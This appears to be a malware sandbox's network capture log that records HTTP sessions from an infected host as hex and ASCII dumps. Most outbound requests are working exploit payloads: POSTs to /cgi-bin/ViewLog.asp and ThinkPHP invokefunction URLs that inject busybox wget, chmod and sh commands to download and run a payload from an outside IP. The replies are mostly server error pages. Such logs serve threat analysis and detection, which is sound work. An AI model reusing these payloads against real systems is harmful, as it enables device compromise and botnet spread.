52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61
                                                        Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own ca


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        318192.168.2.235582295.161.215.21880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.210061073 CEST117INHTTP/1.1 500 Server Error
                                                        Content-Length: 48
                                                        Date: Sun, 14 Apr 2024 14:35:46 GMT
                                                        Connection: close
                                                        Apr 14, 2024 16:35:46.210488081 CEST60INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 63 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                        Data Ascii: Error 500: Server ErrorClient closed connection


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        319192.168.2.235097231.13.172.248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.576467037 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:46.873162985 CEST626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Sun, 14 Apr 2024 14:35:46 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        320192.168.2.235042462.178.214.668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.634814024 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        321192.168.2.235010431.135.150.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.658400059 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:47.704878092 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:48.053457022 CEST21INHTTP/1.1
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        322192.168.2.234922631.200.73.978080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.658466101 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        323192.168.2.234022494.121.73.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.658523083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        324192.168.2.234174694.121.48.138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.658571005 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        325192.168.2.233903895.101.7.8880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.905683994 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.207613945 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 37 26 23 34 36 3b 66 65 35 34 33 38 66 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 39 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 37 26 23 34 36 3b 66 65 35 34 33 38 66 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;95b0f748&#46;1713105347&#46;fe5438f<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;95b0f748&#46;1713105347&#46;fe5438f</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        326192.168.2.234106495.85.215.12580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.912714958 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.223472118 CEST242INHTTP/1.0 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 113
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        327192.168.2.235992095.101.220.14580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.916378975 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.230288029 CEST577INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 355
                                                        Expires: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 35 30 62 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 37 26 23 34 36 3b 62 33 62 31 39 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 31 35 30 62 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 37 26 23 34 36 3b 62 33 62 31 39 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;150b1502&#46;1713105347&#46;b3b19<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;150b1502&#46;1713105347&#46;b3b19</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        328192.168.2.235383095.63.34.24680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:46.922260046 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.241416931 CEST392INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        329192.168.2.235634631.136.161.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.335484028 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:48.318936110 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:50.238620996 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:54.302284002 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.981008053 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:17.338865995 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:49.590437889 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        330192.168.2.235443694.187.109.538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.356714010 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


